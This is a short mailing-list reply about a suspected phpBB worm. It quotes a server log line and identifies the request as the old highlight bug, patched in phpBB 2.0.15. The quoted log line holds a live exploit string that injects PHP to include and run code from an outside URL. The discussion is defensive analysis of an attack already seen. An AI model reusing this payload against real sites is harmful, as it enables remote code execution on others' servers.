Re: New (maybe old?) PhpBB worm about?

[Alex 'CAVE' Cernat <cave () cernat ro>]

Robin wrote:

> I just noticed these in my logs:
> 63.193.240.128 - - [11/Dec/2005:01:43:25 +1300] 
> "GET /pbem/viewtopic.php?t=37&highlight=%2527.$poster=include($_GET[m]).
> %2527&m=http://www.yatas.com/phpbb_private.txt?&; HTTP/1.0" 403 1094 
> "http://www.google.nl/"; "Mozilla/4.0 (modded by sirh0t fuck Aleks)"
>
>  
It's the old highlight bug (i've remember the %2527). I believe it was 
used an year ago (of course, with some unpatched phpbb installations, it 
is still active, maybe some new worm using this old technique). IIRC, 
the bug was fixed in 2.0.15 (the current version is now 2.0.18, so ... a 
long time).

Alex